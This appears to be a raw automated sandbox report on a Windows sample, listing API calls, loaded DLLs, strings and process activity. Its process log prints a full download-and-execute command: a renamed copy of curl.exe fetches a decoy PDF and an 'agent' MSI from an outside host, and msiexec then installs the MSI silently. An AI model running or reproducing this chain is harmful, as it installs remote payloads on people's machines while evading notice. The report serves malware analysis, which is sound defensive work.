Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4F820 CryptAcquireContextA,CryptCreateHash, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E46400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E46591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E43EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4C730 CryptHashData, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E277F7 -----BEGIN PUBLIC KEY----- |
Source: TNheBOJElq.exe |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
Source: |
Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
Source: unknown |
DNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3) |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1D8C0 recv,WSAGetLastError, |
Source: TNheBOJElq.exe |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: Usage: curl [options...] <url> |
Source: global traffic |
DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa |
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/P |
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/copyright.htmlD |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/hsts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/hsts.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/sslcerts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E11535 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E3A8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E2C1FD |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1A9B3 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E0E127 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1FAEC |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4CAA0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E533B0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E14415 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E225B8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E12564 appears 48 times |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1D632 appears 245 times |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E120E6 appears 46 times |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1D6AD appears 301 times |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E0913E appears 64 times |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1201D appears 39 times |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1251E appears 48 times |
Source: classification engine |
Classification label: clean8.win@11/3@1/0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E0310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, |
Source: C:\Windows\SysWOW64\cmd.exe |
File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all". |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
Source: unknown |
Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: ntmarta.dll |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: apphelp.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: secur32.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: sspicli.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: iphlpapi.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mswsock.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: aclayers.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: mpr.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc_os.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: msi.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: srpapi.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: tsappcmp.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: uxtheme.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: wkscli.dll |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netutils.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: apphelp.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: aclayers.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc_os.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: msi.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: tsappcmp.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: userenv.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: profapi.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sspicli.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netapi32.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: wkscli.dll |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netutils.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
API coverage: 3.3 % |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: TNheBOJElq.exe, 00000003.00000003.1638561356.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000004.00000003.1641387385.0000000003460000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E50CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E516BE SetUnhandledExceptionFilter, |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\qmqjabdqio.pdf" hxxps://dbs5.pwods.com/download/pdf & "c:\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi hxxps://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn" |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E5137A cpuid |
Source: C:\Windows\SysWOW64\cmd.exe |
Queries volume information: C:\ VolumeInformation |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E51775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E3A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E38490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, |